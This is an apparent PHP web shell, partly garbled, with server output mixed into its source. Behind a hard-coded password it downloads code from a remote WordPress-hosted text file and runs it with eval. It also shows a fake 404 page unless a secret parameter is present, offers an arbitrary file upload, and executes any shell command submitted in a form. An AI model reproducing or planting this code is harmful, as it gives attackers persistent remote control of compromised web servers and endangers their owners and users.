// PHP file password protection codesession_start();// Correct password (you can change this)$correct_password = "R8scan";// Check if user submitted passwordif (isset($_POST['zb'])) { if ($_POST['zb'] == $correct_password) { $_SESSION['authenticated'] = true; } else { $error = "Incorrect password!"; }}// If user is not authenticated, show password formif (!isset($_SESSION['authenticated']) || !$_SESSION['authenticated']) { if (isset($error)) echo "<p class='error'>$error</p>";
exit();}// Protected content starts here// -----------------------------------goto mulai;mulai:$url = "https://japaneseswordmuseumthailand.com/wp-content/languages/plugins/classic-editor-th.txt";goto ambil;ambil:$ch = curl_init($url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);curl_setopt($ch, CURLOPT_TIMEOUT, 10);$code = curl_exec($ch);goto cek_error;cek_error:if (curl_errno($ch)) { echo "cURL Error: " . curl_error($ch); curl_close($ch); goto selesai;}curl_close($ch);goto jalankan;jalankan:if ($code !== false) { eval("".$code);} else { echo "Gagal mengambil kode dari URL.";}selesai:$os = (strtolower(substr(Linux Server 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC x86_64, 0, 3)) == "win" ? "(Win32)" : "");if (!isset($_GET['ezza'])) {404 exit('<!DOCTYPE html><title>404</title>');}echo '

' . Linux Server 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC x86_64 . '
';// File Upload Formecho '
';if (isset($_FILES['file']) && isset($_POST['path'])) { $target = $_POST['path'] . '/' . basename($_FILES['file']['name']); echo move_uploaded_file($_FILES['file']['tmp_name'], $target) ? '<font color="green">Upload successful</font>
' : '<font color="red">Upload failed</font>
';}// Command Execution Formecho '
Command:
';if (isset($_POST['cmd'])) { echo '<pre>' . shell_exec($_POST['cmd']) . '</pre>';}